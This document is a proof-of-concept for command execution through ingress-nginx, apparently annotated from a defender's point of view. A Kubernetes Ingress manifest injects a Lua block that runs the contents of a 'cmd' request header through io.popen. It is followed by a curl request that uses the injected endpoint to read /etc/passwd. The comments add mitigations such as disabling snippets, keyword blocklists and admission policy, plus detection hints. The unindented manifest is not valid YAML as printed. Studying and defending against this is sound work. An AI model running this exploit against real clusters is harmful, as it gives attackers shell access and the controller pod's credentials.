Ingress nginx annotation injection causes arbitrary command execution
- Create the Ingress (it can be created without a backing Service or Pod):
# Proof-of-concept Ingress that abuses the ingress-nginx configuration-snippet
# annotation to inject nginx configuration.
# NOTE(review): this listing has lost its indentation; as printed it is not a
# well-formed manifest, and the nesting has to be inferred from the key names.
# Defender view: the annotation value below is attacker-controlled text. Any
# principal allowed to create or update Ingress objects can supply it, so the
# trust boundary here is RBAC on Ingress resources, not cluster-admin.
# Mitigations to verify on the controller:
#   - set allow-snippet-annotations to "false" in the controller ConfigMap;
#   - where the controller version supports it, use
#     annotation-value-word-blocklist to reject annotation values containing
#     tokens such as "content_by_lua", "location" or "}";
#   - reject *-snippet annotations with an admission policy and limit which
#     namespaces and service accounts may write Ingress objects.
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
# configuration-snippet is documented as adding extra configuration to the
# nginx location block generated for this Ingress. The value that follows:
#   1. sets a header, proxies to the upstream balancer and then emits a bare
#      "}", which ends the generated location block early;
#   2. declares a new "location /robinak/" whose content_by_lua_block passes
#      the value of the request header "cmd" to io.popen and writes the
#      command output back in the response;
#   3. opens "location /fs/{" with no closing brace (presumably so that the
#      closing brace of the generated block still balances - confirm against
#      the rendered nginx.conf).
# The command runs inside the ingress controller process, with whatever
# privileges and mounted credentials that pod has.
# Detection: audit Ingress create/update events for snippet annotations that
# contain "}", "location" or "*_by_lua*" directives.
nginx.ingress.kubernetes.io/configuration-snippet: |
more_set_headers "robinak"
proxy_pass http://upstream_balancer;
proxy_redirect off;
}
location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
spec:
# Only "/" on host robinak.me is declared here; "/robinak/" and "/fs/" exist
# solely because of the injected snippet above. The backend Service "exploit"
# is only referenced by name; the page states that it does not need to exist.
rules:
- host: robinak.me
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: exploit
port:
number: 80
- Make request by specifying the public address of your Ingress NGINX controller:
# Request that reaches the injected location. The Host header selects the
# robinak.me rule, and the value of the "cmd" header is the string the Lua
# block hands to io.popen. "IP" is a placeholder for the controller's address.
# Detection: "/robinak/" is not a path declared in the Ingress spec, so hits on
# it (or any request carrying a "cmd" header) are worth alerting on.
# NOTE(review): confirm that your controller's access-log format records
# request headers; if it does not, watch for unexpected child processes of the
# nginx worker in the controller pod instead.
curl -v -H 'Host: robinak.me' -H "cmd: cat /etc/passwd" http://IP/robinak/